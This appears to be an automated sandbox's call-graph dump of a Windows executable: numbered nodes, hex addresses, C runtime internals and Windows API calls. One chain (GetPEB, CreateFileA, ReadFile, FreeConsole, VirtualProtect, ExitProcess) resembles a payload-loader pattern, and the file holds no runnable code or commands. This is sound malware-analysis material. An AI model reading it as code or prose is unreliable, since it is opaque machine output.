15996->15991 16000 344f1c LeaveCriticalSection 15997->16000 15999 344192 15999->15995 16000->15999 16001->15931 14666 331614 GetPEB 14688 331098 14666->14688 14669 331680 GetFileSize 14672 331804 CloseHandle 14669->14672 14673 331694 14669->14673 14670 331828 14671 3329c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 14670->14671 14674 331836 14671->14674 14672->14670 14675 33169c ReadFile 14673->14675 14676 3317fb 14675->14676 14677 3316b9 CloseHandle 14675->14677 14676->14672 14686 3316d0 _Yarn messages _strlen 14677->14686 14687 3317f9 14677->14687 14679 331840 14731 331860 14679->14731 14681 331845 14733 33b468 14681->14733 14686->14679 14686->14681 14686->14687 14713 33186a 14686->14713 14719 332952 14686->14719 14699 33155c 14687->14699 14697 33120e 14688->14697 14698 3310c1 _Yarn messages _strlen 14688->14698 14689 3329c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 14690 331227 CreateFileA 14689->14690 14690->14669 14690->14670 14691 331231 14692 331860 std::ios_base::_Init 31 API calls 14691->14692 14693 331236 14692->14693 14695 33b468 std::ios_base::_Init 29 API calls 14693->14695 14694 332952 codecvt 16 API calls 14694->14698 14695->14693 14696 33186a std::ios_base::_Init 31 API calls 14696->14698 14697->14689 14698->14691 14698->14693 14698->14694 14698->14696 14698->14697 14700 331098 31 API calls 14699->14700 14701 331582 FreeConsole 14700->14701 14738 33123b 14701->14738 14704 33123b 104 API calls 14705 3315b9 14704->14705 14706 331098 31 API calls 14705->14706 14707 3315cc VirtualProtect 14706->14707 14708 3315f1 ExitProcess 14707->14708 14709 3315dd 14707->14709 14710 3329c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 14709->14710 14711 3315e7 14710->14711 14711->14670 14714 331873 14713->14714 14715 33188b 14713->14715 14716 332952 codecvt 16 API calls 14714->14716 15353 331890 14715->15353 14718 33187c 14716->14718 14718->14686 14722 332957 14719->14722 14720 33c994 _Yarn 15 API calls 14720->14722 14721 332971 14721->14686 14722->14720 14722->14721 14723 338f08 codecvt 2 API calls 14722->14723 14724 332973 14722->14724 14723->14722 14725 334a6f codecvt 14724->14725 14726 33297d Concurrency::cancel_current_task 14724->14726 14727 335aba CallUnexpected RaiseException 14725->14727 14729 335aba CallUnexpected RaiseException 14726->14729 14728 334a8b 14727->14728 14730 3331cf 14729->14730 15358 3331d0 14731->15358 14734 33b6a7 __strnicoll 29 API calls 14733->14734 14735 33b477 14734->14735 14736 33b485 __Getctype 11 API calls 14735->14736 14737 33b484 14736->14737 14743 331263 14738->14743 14739 331355 14741 3329c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 14739->14741 14740 3312c2 KiUserExceptionDispatcher 14740->14743 14742 331363 14741->14742 14742->14704 14743->14739 14743->14740 14746 33136e 14743->14746 14762 331533 14743->14762 14747 33138d _strlen 14746->14747 14769 33197e 14747->14769 14749 331444 14773 33408b 14749->14773 14751 331515 14798 331a10 14751->14798 14754 3314c0 14783 331ab6 14754->14783 14755 3313ad 14755->14749 14755->14754 14777 3319d8 14755->14777 14757 3329c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 14759 331529 14757->14759 14758 3319d8 69 API calls 14760 331466 14758->14760 14759->14743 14760->14754 14760->14758 15092 3323c4 14762->15092 14767 331a3a 40 API calls 14768 331558 14767->14768 14768->14743 14771 331995 14769->14771 14770 3319a6 14770->14755 14771->14770 14802 331a3a 14771->14802 14774 33409a 14773->14774 14775 3340ad _Yarn 14773->14775 14774->14760 14775->14774 14812 33c578 14775->14812 14778 3319e5 14777->14778 14779 3319ee 14778->14779 14885 333c1b 14778->14885 14898 333c29 14778->14898 14907 333c0b 14778->14907 14779->14755 14784 331ad6 14783->14784 14785 331ae9 14783->14785 14786 3329c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 14784->14786 14787 331af9 14785->14787 14953 335aba 14785->14953 14788 331ae1 14786->14788 14956 331c57 14787->14956 14788->14751 14794 335aba CallUnexpected RaiseException 14795 331b3a 14794->14795 14967 331e48 14795->14967 14799 331a18 14798->14799 14800 33151e 14799->14800 15088 3322fe 14799->15088 14800->14757 14803 331aa2 14802->14803 14804 331a5a 14802->14804 14806 3329c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 14803->14806 14805 33197e 40 API calls 14804->14805 14807 331a64 14805->14807 14808 331aad 14806->14808 14809 331a9b 14807->14809 14811 331ab6 std::ios_base::_Init 40 API calls 14807->14811 14808->14770 14810 331a10 40 API calls 14809->14810 14810->14803 14811->14809 14813 33c58b _Fputc 14812->14813 14816 33c759 14813->14816 14815 33c5a0 _Fputc 14815->14774 14817 33c78f 14816->14817 14818 33c767 14816->14818 14817->14815 14818->14817 14819 33c796 14818->14819 14820 33c774 14818->14820 14824 33c81c 14819->14824 14821 33b601 __strnicoll 29 API calls 14820->14821 14821->14817 14825 33c828 ___scrt_is_nonwritable_in_current_image 14824->14825 14832 33875f EnterCriticalSection 14825->14832 14827 33c836 14833 33c7d0 14827->14833 14832->14827 14843 340bb7 14833->14843 14840 33c86b 14884 338773 LeaveCriticalSection 14840->14884 14842 33c7ce 14842->14815 14864 340c62 14843->14864 14845 340bc8 _Fputc 14846 33c7e8 14845->14846 14847 33e531 __fread_nolock 15 API calls 14845->14847 14850 33c5b2 14846->14850 14848 340c21 14847->14848 14849 33e4f7 ___free_lconv_mon 14 API calls 14848->14849 14849->14846 14853 33c5c4 14850->14853 14854 33c5ed 14850->14854 14851 33c5d2 14852 33b601 __strnicoll 29 API calls 14851->14852 14852->14854 14853->14851 14853->14854 14858 33c608 _Yarn 14853->14858 14860 340ca0 14854->14860 14856 33bc27 ___scrt_uninitialize_crt 64 API calls 14856->14858 14857 340efc _Fputc 29 API calls 14857->14858 14858->14854 14858->14856 14858->14857 14859 34549f _Fputc 64 API calls 14858->14859 14871 345eec 14858->14871 14859->14858 14861 340cab 14860->14861 14863 33c812 14860->14863 14862 33bc27 ___scrt_uninitialize_crt 64 API calls 14861->14862 14861->14863 14862->14863 14863->14840 14866 340c6e _Fputc 14864->14866 14865 340c98 14865->14845 14866->14865 14867 340efc _Fputc 29 API calls 14866->14867 14868 340c89 14867->14868 14869 348994 __fread_nolock 29 API calls 14868->14869 14870 340c8f 14869->14870 14870->14845 14872 345f7c 14871->14872 14873 340efc _Fputc 29 API calls 14872->14873 14875 345f89 14873->14875 14874 345f95 14874->14858 14875->14874 14876 345ef7 _Fputc 31 API calls 14875->14876 14879 345fe1 14875->14879 14876->14879 14877 340c62 _Fputc 29 API calls 14880 346036 14877->14880 14878 346072 _Fputc 64 API calls 14881 346054 14878->14881 14879->14874 14879->14877 14883 346043 14879->14883 14882 347d00 __fread_nolock 14 API calls 14880->14882 14880->14883 14881->14858 14882->14883 14883->14878 14884->14842 14886 333c22 14885->14886 14890 333c6e 14885->14890 14921 338773 LeaveCriticalSection 14886->14921 14888 333bf9 14888->14779 14889 333c27 14889->14779 14890->14779 14890->14888 14891 333cf2 14890->14891 14892 333cd3 14890->14892 14893 33c578 69 API calls 14891->14893 14897 333ce4 14891->14897 14892->14897 14918 3335da 14892->14918 14893->14897 14894 3329c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 14896 333d31 14894->14896 14896->14779 14897->14894 14901 333c4c 14898->14901 14903 333c45 14898->14903 14899 3329c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 14900 333d31 14899->14900 14900->14779 14901->14903 14904 333cf2 14901->14904 14905 333c92 14901->14905 14902 3335da _Fputc 68 API calls 14902->14903 14903->14899 14904->14903 14906 33c578 69 API calls 14904->14906 14905->14902 14905->14903 14906->14903 14908 333c12 14907->14908 14910 333c17 14907->14910 14952 33875f EnterCriticalSection 14908->14952 14910->14779 14912 333c92 14910->14912 14915 333cf2 14910->14915 14916 333c62 14910->14916 14911 3329c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 14913 333d31 14911->14913 14914 3335da _Fputc 68 API calls 14912->14914 14912->14916 14913->14779 14914->14916 14915->14916 14917 33c578 69 API calls 14915->14917 14916->14911 14917->14916 14922 33c079 14918->14922 14920 3335ea 14920->14897 14921->14889 14923 33c08c _Fputc 14922->14923 14926 33c0da 14923->14926 14925 33c09b _Fputc 14925->14920 14927 33c0e6 ___scrt_is_nonwritable_in_current_image 14926->14927 14928 33c113 14927->14928 14929 33c0ef 14927->14929 14942 33875f EnterCriticalSection 14928->14942 14930 33b601 __strnicoll 29 API calls 14929->14930 14941 33c108 _Fputc 14930->14941 14932 33c11c 14933 33c131 14932->14933 14934 340efc _Fputc 29 API calls 14932->14934 14935 33c1ce 14933->14935 14936 33c19d 14933->14936 14934->14933 14943 33c0ad 14935->14943 14937 33b601 __strnicoll 29 API calls 14936->14937 14937->14941 14939 33c1da 14948 33c206 14939->14948 14941->14925 14942->14932 14944 33c0bb 14943->14944 14945 33c0cc 14943->14945 14946 345eec _Fputc 66 API calls 14944->14946 14945->14939 14947 33c0c7 14946->14947 14947->14939 14951 338773 LeaveCriticalSection 14948->14951 14950 33c20c 14950->14941 14951->14950 14952->14910 14954 335b02 RaiseException 14953->14954 14955 335ad4 14953->14955 14954->14787 14955->14954 14957 331b17 14956->14957 14958 331c7a 14956->14958 14964 331b3a 14957->14964 14984 3329d4 AcquireSRWLockExclusive 14958->14984 14960 331c84 14960->14957 14989 332a89 14960->14989 14965 331e48 std::ios_base::_Init 40 API calls 14964->14965 14966 331b2f 14965->14966 14966->14794 14968 331e75 _strlen 14967->14968 14969 331e80 14968->14969 14970 331f5e 14968->14970 14971 331e8f _Yarn 14969->14971 14973 331ed0 14969->14973 14974 331ec8 14969->14974 14972 331860 std::ios_base::_Init 31 API calls 14970->14972 15028 331f68 14971->15028 14975 331f63 14972->14975 14978 332952 codecvt 16 API calls 14973->14978 14977 33186a std::ios_base::_Init 31 API calls 14974->14977 14976 33b468 std::ios_base::_Init 29 API calls 14975->14976 14976->14975 14977->14971 14978->14971 14981 331f30 messages 14982 3329c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 14981->14982 14983 331b4f 14982->14983 14983->14751 14985 3329e8 14984->14985 14986 3329ed ReleaseSRWLockExclusive 14985->14986 14993 332a74 SleepConditionVariableSRW 14985->14993 14986->14960 14994 332a9e 14989->14994 14992 332a23 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 14992->14957 14993->14985 14995 332ab4 14994->14995 14996 332aad 14994->14996 15003 33aa54 14995->15003 15000 33aac5 14996->15000 14999 331c9a 14999->14992 15001 33aa54 std::ios_base::_Init 32 API calls 15000->15001 15002 33aad7 15001->15002 15002->14999 15006 33acb7 15003->15006 15007 33acc3 ___scrt_is_nonwritable_in_current_image 15006->15007 15014 33b750 EnterCriticalSection 15007->15014 15009 33acd1 15015 33aadb 15009->15015 15011 33acde 15025 33ad06 15011->15025 15014->15009 15016 33aaf6 15015->15016 15017 33ab69 std::_Lockit::_Lockit 15015->15017 15016->15017 15018 33ab49 15016->15018 15019 343f46 std::ios_base::_Init 32 API calls 15016->15019 15017->15011 15018->15017 15020 343f46 std::ios_base::_Init 32 API calls 15018->15020 15021 33ab3f 15019->15021 15022 33ab5f 15020->15022 15023 33e4f7 ___free_lconv_mon 14 API calls 15021->15023 15024 33e4f7 ___free_lconv_mon 14 API calls 15022->15024 15023->15018 15024->15017 15026 33b767 std::_Lockit::~_Lockit LeaveCriticalSection 15025->15026 15027 33aa85 15026->15027 15027->14999 15029 331fa0 15028->15029 15030 331faa 15029->15030 15031 3320be 15029->15031 15034 331ff0 15030->15034 15035 331fe8 15030->15035 15041 331fb2 _Yarn 15030->15041 15032 331860 std::ios_base::_Init 31 API calls 15031->15032 15033 3320c3 15032->15033 15036 33b468 std::ios_base::_Init 29 API calls 15033->15036 15038 332952 codecvt 16 API calls 15034->15038 15037 33186a std::ios_base::_Init 31 API calls 15035->15037 15036->15033 15037->15041 15038->15041 15047 3320c8 15041->15047 15044 3329c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 15045 331f0d 15044->15045 15045->14975 15045->14981 15046 332085 messages 15046->15044 15048 3320ea 15047->15048 15050 3320f8 15047->15050 15066 33218a 15048->15066 15051 33218a std::ios_base::_Init 40 API calls 15050->15051 15052 33211b 15051->15052 15053 33213f messages 15052->15053 15055 332185 15052->15055 15054 3329c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 15053->15054 15056 332029 15054->15056 15057 33b468 std::ios_base::_Init 29 API calls 15055->15057 15058 336097 15056->15058 15057->15055 15059 3360a4 15058->15059 15065 332059 15058->15065 15059->15065 15081 33c994 15059->15081 15062 33e16c ___std_exception_copy 29 API calls 15064 3360d1 15062->15064 15063 33c522 __freea 14 API calls 15063->15065 15064->15063 15065->15033 15065->15046 15067 3321a9 15066->15067 15076 33224f _Yarn messages 15066->15076 15068 3322f3 15067->15068 15069 3321b8 15067->15069 15070 331860 std::ios_base::_Init 31 API calls 15068->15070 15071 3321e3 15069->15071 15075 3322e8 15069->15075 15078 3321e9 _Yarn 15069->15078 15070->15078 15072 33186a std::ios_base::_Init 31 API calls 15071->15072 15072->15078 15073 33b468 std::ios_base::_Init 29 API calls 15074 3322fd 15073->15074 15079 332339 15074->15079 15080 331ab6 std::ios_base::_Init 40 API calls 15074->15080 15077 332952 codecvt 16 API calls 15075->15077 15076->15050 15077->15078 15078->15073 15078->15076 15079->15050 15080->15079 15086 33e531 __dosmaperr 15081->15086 15082 33e56f 15083 33ad6d __dosmaperr 14 API calls 15082->15083 15085 3360c1 15083->15085 15084 33e55a RtlAllocateHeap 15084->15085 15084->15086 15085->15062 15085->15064 15086->15082 15086->15084 15087 338f08 codecvt 2 API calls 15086->15087 15087->15086 15089 332339 15088->15089 15090 33230b 15088->15090 15089->14800 15090->15089 15091 331ab6 std::ios_base::_Init 40 API calls 15090->15091 15091->15089 15093 3323ea 15092->15093 15109 33242b 15093->15109 15095 3329c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 15097 331546 15095->15097 15098 33233c 15097->15098 15099 33197e 40 API calls 15098->15099 15100 332358 15099->15100 15101 332372 15100->15101 15102 3319d8 69 API calls 15100->15102 15103 331ab6 std::ios_base::_Init 40 API calls 15101->15103 15102->15101 15104 3323a7 15103->15104 15105 331a10 40 API calls 15104->15105 15106 3323ae 15105->15106 15107 3329c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 15106->15107 15108 331551 15107->15108 15108->14767 15126 332cd9 15109->15126 15113 33248c 15158 332d0a 15113->15158 15114 33245e 15114->15113 15140 33254a 15114->15140 15117 3324a8 15119 3329c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 15117->15119 15122 3323f0 15119->15122 15120 332483 15152 332d7d 15120->15152 15121 3324bc 15165 3325d6 15121->15165 15122->15095 15127 332ce8 15126->15127 15128 332cef 15126->15128 15176 33b77e 15127->15176 15130 33244b 15128->15130 15181 3351f8 EnterCriticalSection 15128->15181 15132 3324c2 15130->15132 15133 3324d8 15132->15133 15139 3324fc 15132->15139 15134 332cd9 std::_Lockit::_Lockit 7 API calls 15133->15134 15136 3324e3 15134->15136 15135 3329c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 15137 332509 15135->15137 15138 332d0a std::_Lockit::~_Lockit 2 API calls 15136->15138 15137->15114 15138->15139 15139->15135 15141 332563 15140->15141 15142 3325bf 15140->15142 15141->15142 15145 332952 codecvt 16 API calls 15141->15145 15143 3329c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 15142->15143 15144 33247b 15143->15144 15144->15120 15144->15121 15146 332573 15145->15146 15230 3325fa 15146->15230 15153 33c994 _Yarn 15 API calls 15152->15153 15154 332d88 15153->15154 15155 332d8f 15154->15155 15347 3331b3 15154->15347 15155->15113 15159 33b78c 15158->15159 15161 332d14 15158->15161 15352 33b767 LeaveCriticalSection 15159->15352 15162 332d27 15161->15162 15351 335206 LeaveCriticalSection 15161->15351 15162->15117 15164 33b793 15164->15117 15166 3325fa 15165->15166 15167 335aba CallUnexpected RaiseException 15165->15167 15168 332cd9 std::_Lockit::_Lockit 7 API calls 15166->15168 15167->15166 15169 33260b 15168->15169 15170 332647 15169->15170 15171 332635 15169->15171 15173 3331f0 codecvt 31 API calls 15170->15173 15172 332dff codecvt 65 API calls 15171->15172 15174 3324c1 15172->15174 15175 332651 15173->15175 15182 33f432 15176->15182 15181->15130 15183 33f5b9 std::_Lockit::_Lockit 5 API calls 15182->15183 15184 33f437 15183->15184 15203 33f5d3 15184->15203 15202 33f464 15202->15202 15204 33f534 std::_Lockit::_Lockit 5 API calls 15203->15204 15205 33f43c 15204->15205 15206 33f5ed 15205->15206 15207 33f534 std::_Lockit::_Lockit 5 API calls 15206->15207 15208 33f441 15207->15208 15209 33f607 15208->15209 15210 33f534 std::_Lockit::_Lockit 5 API calls 15209->15210 15211 33f446 15210->15211 15212 33f621 15211->15212 15213 33f534 std::_Lockit::_Lockit 5 API calls 15212->15213 15214 33f44b 15213->15214 15215 33f63b 15214->15215 15216 33f534 std::_Lockit::_Lockit 5 API calls 15215->15216 15217 33f450 15216->15217 15218 33f655 15217->15218 15219 33f534 std::_Lockit::_Lockit 5 API calls 15218->15219 15220 33f455 15219->15220 15221 33f66f 15220->15221 15222 33f534 std::_Lockit::_Lockit 5 API calls 15221->15222 15223 33f45a 15222->15223 15224 33f689 15223->15224 15225 33f534 std::_Lockit::_Lockit 5 API calls 15224->15225 15226 33f45f 15225->15226 15227 33f6a3 15226->15227 15228 33f534 std::_Lockit::_Lockit 5 API calls 15227->15228 15229 33f6b9 15228->15229 15229->15202 15231 332cd9 std::_Lockit::_Lockit 7 API calls 15230->15231 15232 33260b 15231->15232 15233 332647 15232->15233 15234 332635 15232->15234 15275 3331f0 15233->15275 15266 332dff 15234->15266 15239 334915 15310 338588 15239->15310 15282 33c99f 15266->15282 15270 332e24 15271 332e33 15270->15271 15272 33c99f std::_Locinfo::_Locinfo_dtor 64 API calls 15270->15272 15273 332e65 _Yarn 15 API calls 15271->15273 15272->15271 15274 33259b 15273->15274 15274->15239 15301 333292 15275->15301 15278 335aba CallUnexpected RaiseException 15279 33320f 15278->15279 15304 331918 15279->15304 15283 33f432 std::_Lockit::_Lockit 5 API calls 15282->15283 15284 33c9ac 15283->15284 15293 33cbd1 15284->15293 15287 332e65 15288 332e73 15287->15288 15289 332e9e _Yarn 15287->15289 15290 332e7f 15288->15290 15291 33c522 __freea 14 API calls 15288->15291 15289->15270 15290->15289 15292 33c994 _Yarn 15 API calls 15290->15292 15291->15290 15292->15289 15294 33cbdd ___scrt_is_nonwritable_in_current_image 15293->15294 15295 33b750 std::_Lockit::_Lockit EnterCriticalSection 15294->15295 15296 33cbeb 15295->15296 15297 33ca72 std::_Locinfo::_Locinfo_dtor 64 API calls 15296->15297 15298 33cbf8 15297->15298 15299 33cc20 std::_Locinfo::_Locinfo_dtor LeaveCriticalSection 15298->15299 15300 332e0c 15299->15300 15300->15287 15307 333155 15301->15307 15305 336097 ___std_exception_copy 30 API calls 15304->15305 15306 33193a 15305->15306 15308 336097 ___std_exception_copy 30 API calls 15307->15308 15309 333181 15308->15309 15309->15278 15311 33e783 __Getctype 39 API calls 15310->15311 15312 338593 15311->15312 15313 33ed66 __Getctype 39 API calls 15312->15313 15314 3385a3 15313->15314 15348 3331c1 Concurrency::cancel_current_task 15347->15348 15349 335aba CallUnexpected RaiseException 15348->15349 15350 3331cf 15349->15350 15351->15162 15352->15164 15354 335aba CallUnexpected RaiseException 15353->15354 15355 3318b4 15354->15355 15356 336097 ___std_exception_copy 30 API calls 15355->15356 15357 3318d6 15356->15357 15357->14715 15363 333258 15358->15363 15361 335aba CallUnexpected RaiseException 15362 3331ef 15361->15362 15364 333155 std::exception::exception 30 API calls 15363->15364 15365 3331e1 15364->15365 15365->15361 16062 333e04 16063 333e10 __EH_prolog3_GS 16062->16063 16066 333e60 16063->16066 16067 333e79 16063->16067 16071 333e2a 16063->16071 16076 3335ba 16066->16076 16079 33bec9 16067->16079 16103 33535e 16071->16103 16072 333e98 16072->16071 16074 33bec9 45 API calls 16072->16074 16075 333f6d 16072->16075 16099 3333ee 16072->16099 16074->16072 16075->16071 16106 33cf47 16075->16106 16077 33bec9 45 API calls 16076->16077 16078 3335c5 16077->16078 16078->16071 16080 33bed5 ___scrt_is_nonwritable_in_current_image 16079->16080 16081 33bef7 16080->16081 16082 33bedf 16080->16082 16119 33875f EnterCriticalSection 16081->16119 16084 33ad6d __dosmaperr 14 API calls 16082->16084 16086 33bee4 16084->16086 16085 33bf02 16088 340efc _Fputc 29 API calls 16085->16088 16091 33bf1a 16085->16091 16087 33b458 __strnicoll 29 API calls 16086->16087 16098 33beef _Fputc 16087->16098 16088->16091 16089 33bf82 16092 33ad6d __dosmaperr 14 API calls 16089->16092 16090 33bfaa 16120 33bfe2 16090->16120 16091->16089 16091->16090 16094 33bf87 16092->16094 16096 33b458 __strnicoll 29 API calls 16094->16096 16095 33bfb0 16130 33bfda 16095->16130 16096->16098 16098->16072 16100 333422 16099->16100 16102 3333fe 16099->16102 16292 3346df 16100->16292 16102->16072 16104 3329c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 16103->16104 16105 335368 16104->16105 16105->16105 16107 33cf53 ___scrt_is_nonwritable_in_current_image 16106->16107 16108 33cf5a 16107->16108 16109 33cf6f 16107->16109 16110 33ad6d __dosmaperr 14 API calls 16108->16110 16307 33875f EnterCriticalSection 16109->16307 16112 33cf5f 16110->16112 16114 33b458 __strnicoll 29 API calls 16112->16114 16113 33cf79 16308 33cfba 16113->16308 16116 33cf6a 16114->16116 16116->16075 16119->16085 16121 33c003 16120->16121 16122 33bfee 16120->16122 16124 33c012 16121->16124 16133 345d52 16121->16133 16123 33ad6d __dosmaperr 14 API calls 16122->16123 16125 33bff3 16123->16125 16124->16095 16127 33b458 __strnicoll 29 API calls 16125->16127 16129 33bffe 16127->16129 16129->16095 16291 338773 LeaveCriticalSection 16130->16291 16132 33bfe0 16132->16098 16134 345d5d 16133->16134 16135 345d6a 16134->16135 16139 345d82 16134->16139 16136 33ad6d __dosmaperr 14 API calls 16135->16136 16137 345d6f 16136->16137 16138 33b458 __strnicoll 29 API calls 16137->16138 16140 33c00f 16138->16140 16139->16140 16141 345de1 16139->16141 16154 347d00 16139->16154 16140->16095 16142 340efc _Fputc 29 API calls 16141->16142 16144 345dfa 16142->16144 16159 346144 16144->16159 16147 340efc _Fputc 29 API calls 16148 345e33 16147->16148 16148->16140 16149 340efc _Fputc 29 API calls 16148->16149 16150 345e41 16149->16150 16150->16140 16151 340efc _Fputc 29 API calls 16150->16151 16152 345e4f 16151->16152 16153 340efc _Fputc 29 API calls 16152->16153 16153->16140 16155 33f807 __dosmaperr 14 API calls 16154->16155 16156 347d1d 16155->16156 16157 33e4f7 ___free_lconv_mon 14 API calls 16156->16157 16158 347d27 16157->16158 16158->16141 16160 346150 ___scrt_is_nonwritable_in_current_image 16159->16160 16161 346158 16160->16161 16164 346173 16160->16164 16162 33ad80 __dosmaperr 14 API calls 16161->16162 16163 34615d 16162->16163 16166 33ad6d __dosmaperr 14 API calls 16163->16166 16165 34618a 16164->16165 16167 3461c5 16164->16167 16168 33ad80 __dosmaperr 14 API calls 16165->16168 16188 345e02 16166->16188 16169 3461e3 16167->16169 16170 3461ce 16167->16170 16171 34618f 16168->16171 16189 344ef9 EnterCriticalSection 16169->16189 16172 33ad80 __dosmaperr 14 API calls 16170->16172 16174 33ad6d __dosmaperr 14 API calls 16171->16174 16175 3461d3 16172->16175 16177 346197 16174->16177 16178 33ad6d __dosmaperr 14 API calls 16175->16178 16176 3461e9 16179 34621d 16176->16179 16180 346208 16176->16180 16182 33b458 __strnicoll 29 API calls 16177->16182 16178->16177 16190 34625d 16179->16190 16181 33ad6d __dosmaperr 14 API calls 16180->16181 16185 34620d 16181->16185 16182->16188 16184 346218 16253 346255 16184->16253 16186 33ad80 __dosmaperr 14 API calls 16185->16186 16186->16184 16188->16140 16188->16147 16189->16176 16191 346287 16190->16191 16192 34626f 16190->16192 16193 3465c9 16191->16193 16197 3462ca 16191->16197 16194 33ad80 __dosmaperr 14 API calls 16192->16194 16196 33ad80 __dosmaperr 14 API calls 16193->16196 16195 346274 16194->16195 16198 33ad6d __dosmaperr 14 API calls 16195->16198 16199 3465ce 16196->16199 16200 3462d5 16197->16200 16204 34627c 16197->16204 16208 346305 16197->16208 16198->16204 16201 33ad6d __dosmaperr 14 API calls 16199->16201 16203 33ad80 __dosmaperr 14 API calls 16200->16203 16202 3462e2 16201->16202 16206 33b458 __strnicoll 29 API calls 16202->16206 16205 3462da 16203->16205 16204->16184 16207 33ad6d __dosmaperr 14 API calls 16205->16207 16206->16204 16207->16202 16209 34631e 16208->16209 16210 346359 16208->16210 16211 34632b 16208->16211 16209->16211 16243 346347 16209->16243 16214 33e531 __fread_nolock 15 API calls 16210->16214 16212 33ad80 __dosmaperr 14 API calls 16211->16212 16213 346330 16212->16213 16215 33ad6d __dosmaperr 14 API calls 16213->16215 16217 34636a 16214->16217 16218 346337 16215->16218 16220 33e4f7 ___free_lconv_mon 14 API calls 16217->16220 16221 33b458 __strnicoll 29 API calls 16218->16221 16219 3464a5 16222 346519 16219->16222 16225 3464be GetConsoleMode 16219->16225 16223 346373 16220->16223 16252 346342 __fread_nolock 16221->16252 16224 34651d ReadFile 16222->16224 16226 33e4f7 ___free_lconv_mon 14 API calls 16223->16226 16227 346535 16224->16227 16228 346591 GetLastError 16224->16228 16225->16222 16229 3464cf 16225->16229 16230 34637a 16226->16230 16227->16228 16244 34650e 16227->16244 16233 3464f5 16228->16233 16234 34659e 16228->16234 16229->16224 16235 3464d5 ReadConsoleW 16229->16235 16231 346384 16230->16231 16232 34639f 16230->16232 16236 33ad6d __dosmaperr 14 API calls 16231->16236 16238 343ff3 __fread_nolock 31 API calls 16232->16238 16245 33ad93 __dosmaperr 14 API calls 16233->16245 16233->16252 16237 33ad6d __dosmaperr 14 API calls 16234->16237 16239 3464ef GetLastError 16235->16239 16235->16244 16241 346389 16236->16241 16242 3465a3 16237->16242 16238->16243 16239->16233 16240 33e4f7 ___free_lconv_mon 14 API calls 16240->16204 16246 33ad80 __dosmaperr 14 API calls 16241->16246 16247 33ad80 __dosmaperr 14 API calls 16242->16247 16256 348994 16243->16256 16248 346571 16244->16248 16249 34655a 16244->16249 16244->16252 16245->16252 16246->16252 16247->16252 16248->16252 16278 34690a 16248->16278 16265 346666 16249->16265 16252->16240 16290 344f1c LeaveCriticalSection 16253->16290 16255 34625b 16255->16188 16257 3489a1 16256->16257 16258 3489ae 16256->16258 16259 33ad6d __dosmaperr 14 API calls 16257->16259 16260 33ad6d __dosmaperr 14 API calls 16258->16260 16262 3489ba 16258->16262 16261 3489a6 16259->16261 16263 3489db 16260->16263 16261->16219 16262->16219 16264 33b458 __strnicoll 29 API calls 16263->16264 16264->16261 16284 3467bd 16265->16284 16267 33e57f __strnicoll MultiByteToWideChar 16268 34677a 16267->16268 16272 346783 GetLastError 16268->16272 16275 3466ae 16268->16275 16269 346708 16276 3466c2 16269->16276 16277 343ff3 __fread_nolock 31 API calls 16269->16277 16270 3466f8 16273 33ad6d __dosmaperr 14 API calls 16270->16273 16274 33ad93 __dosmaperr 14 API calls 16272->16274 16273->16275 16274->16275 16275->16252 16276->16267 16277->16276 16279 346944 16278->16279 16280 3469da ReadFile 16279->16280 16281 3469d5 16279->16281 16280->16281 16282 3469f7 16280->16282 16281->16252 16282->16281 16283 343ff3 __fread_nolock 31 API calls 16282->16283 16283->16281 16285 3467f1 16284->16285 16286 346862 ReadFile 16285->16286 16287 34667d 16285->16287 16286->16287 16288 34687b 16286->16288 16287->16269 16287->16270 16287->16275 16287->16276 16288->16287 16289 343ff3 __fread_nolock 31 API calls 16288->16289 16289->16287 16290->16255 16291->16132 16293 334793 16292->16293 16294 334703 16292->16294 16295 331860 std::ios_base::_Init 31 API calls 16293->16295 16299 3347f6 16294->16299 16296 334798 16295->16296 16298 334720 _Yarn _Deallocate 16298->16102 16300 334802 16299->16300 16301 334800 16299->16301 16302 334811 16300->16302 16303 33480a 16300->16303 16301->16298 16305 332952 codecvt 16 API calls 16302->16305 16304 33186a std::ios_base::_Init 31 API calls 16303->16304 16306 33480f 16304->16306 16305->16306 16306->16298 16307->16113 16309 33cfd2 16308->16309 16311 33d042 16308->16311 16310 340efc _Fputc 29 API calls 16309->16310 16316 33cfd8 16310->16316 16312 33cf87 16311->16312 16313 347d00 __fread_nolock 14 API calls 16311->16313 16319 33cfb2 16312->16319 16313->16312 16314 33d02a 16315 33ad6d __dosmaperr 14 API calls 16314->16315 16317 33d02f 16315->16317 16316->16311 16316->16314 16318 33b458 __strnicoll 29 API calls 16317->16318 16318->16312 16322 338773 LeaveCriticalSection 16319->16322 16321 33cfb8 16321->16116 16322->16321 17423 33430a 17424 334342 17423->17424 17425 334313 17423->17425 17425->17424 17428 33bb66 17425->17428 17427 334335 17429 33bb78 17428->17429 17433 33bb81 ___scrt_uninitialize_crt 17428->17433 17430 33bce4 ___scrt_uninitialize_crt 68 API calls 17429->17430 17431 33bb7e 17430->17431 17431->17427 17432 33bb90 17432->17427 17433->17432 17436 33be69 17433->17436 17437 33be75 ___scrt_is_nonwritable_in_current_image 17436->17437 17444 33875f EnterCriticalSection 17437->17444 17439 33be83 17440 33bbc2 ___scrt_uninitialize_crt 68 API calls 17439->17440 17441 33be94 